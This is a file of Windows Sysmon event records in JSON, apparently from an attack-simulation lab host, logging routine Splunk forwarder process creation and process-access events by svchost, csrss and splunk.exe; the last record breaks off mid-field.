{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.665\r\nProcessGuid: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nProcessId: 2660\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.665","ProcessGuid":"{41C8662E-1F76-5F25-0000-001099DD0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nTargetProcessId: 2660\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","TargetProcessId":"2660","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nTargetProcessId: 2660\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","TargetProcessId":"2660","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 